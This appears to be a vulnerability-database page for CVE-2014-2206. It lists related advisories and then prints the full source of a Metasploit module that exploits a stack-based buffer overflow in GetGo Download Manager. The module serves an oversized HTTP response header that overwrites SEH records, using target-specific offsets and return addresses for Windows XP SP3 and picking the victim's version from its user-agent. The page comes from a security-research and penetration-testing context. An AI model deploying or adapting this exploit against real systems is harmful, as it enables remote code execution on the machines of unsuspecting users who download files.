| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow | 9 Mar 201400:00 | – | zdt | |
| GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution Explo | 10 Mar 201400:00 | – | zdt | |
| GetGo Download Manager HTTP Response Buffer Overflow Exploit | 19 Jan 201500:00 | – | zdt | |
| Exploit for Cross-site Scripting in Astaro Security_Gateway_Software | 30 Apr 201915:15 | – | githubexploit | |
| CVE-2014-2206 | 9 Mar 201400:00 | – | circl | |
| GetGo Download Manager HTTP Response Header Buffer Overflow (CVE-2014-2206) | 12 Jan 201700:00 | – | checkpoint_advisories | |
| CVE-2014-2206 | 5 Mar 201415:00 | – | cve | |
| CVE-2014-2206 | 5 Mar 201415:00 | – | cvelist | |
| GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution | 9 Mar 201400:00 | – | exploitdb | |
| GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution | 9 Mar 201400:00 | – | exploitpack |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Seh
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'GetGo Download Manager HTTP Response Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability in
GetGo Download Manager version 5.3.0.2712 earlier, caused by an
overly long HTTP response header.
By persuading the victim to download a file from a malicious server, a
remote attacker could execute arbitrary code on the system or cause
the application to crash. This module has been tested successfully on
Windows XP SP3.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Julien Ahrens', # Vulnerability discovery
'Gabor Seljan', # Metasploit module for v4
'bzyo', # Metasploit module for v5
'sinn3r' # Helping Gabor and bzyo (see #4588 & #9642)
],
'References' =>
[
[ 'EDB', '32132' ],
[ 'OSVDB', '103910' ],
[ 'CVE', '2014-2206' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'URIPATH' => "/shakeitoff.mp3"
},
'Platform' => 'win',
'Payload' =>
{
# v5 has no bad chars
'BadChars' => "\x00\x0a\x0d"
},
'Targets' =>
[
[
'Automatic', {}
],
[ '4.9.0.1982 on Windows XP SP3',
{
'Offset' => 4107,
'Ret' => 0x00280b0b # CALL DWORD PTR SS:[EBP+30]
}
],
[
'5.3.0.2712 on Windows XP SP3',
{
'Offset' => 4095,
# 0:016> u 0x72d11f39
# msacm32!wodMessage+0xd0f:
# 72d11f39 5f pop edi
# 72d11f3a 5e pop esi
# 72d11f3b c20400 ret 4
'Ret' => 0x72d11f39,
# 12253 is the same size the python PoC used
'MaxSize' => 12253
}
]
],
'Privileged' => false,
'DisclosureDate' => '2014-03-09',
'DefaultTarget' => 0))
end
# This part is from Gabor Seljan
def exploit_v4(cli, current_taget)
sploit = rand_text_alpha(current_taget['Offset'])
sploit << "\x90\x90\xEB\x06"
sploit << [current_taget.ret].pack('V')
sploit << payload.encoded
print_status("Sending #{sploit.length} bytes to port #{cli.peerport}...")
resp = create_response(200, sploit)
resp.body = ""
cli.send_response(resp)
end
# This part is from Auxilus with some help from @_sinn3r
def exploit_v5(cli, current_taget)
seh_record = generate_seh_record(current_taget.ret)
# Minus 4 for the SEH record
buffer = Rex::Text.rand_text_alpha(current_taget['Offset'] - 4)
buffer << seh_record
buffer << payload.encoded
buffer << Rex::Text.rand_text_alpha(current_taget['MaxSize'] - buffer.length)
res = create_response(200, buffer)
cli.send_response(res)
end
def on_request_uri(cli, request)
print_status("#{cli.peerhost} connected")
current_target = target
user_agent = request.headers['User-Agent'].to_s
if current_target == targets[1] || user_agent.match(/GetGo Download Manager 4\.0/)
print_status('Attempting to exploit against v4')
current_target = targets[1]
exploit_v4(cli, current_target)
elsif current_target == targets[2] || user_agent.match(/GetGo Download Manager 5\.0/)
print_status('Attempting to exploit against v5')
current_target = targets[2]
exploit_v5(cli, current_target)
else
print_error('Sending 404 for unknown user-agent')
send_not_found(cli)
end
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation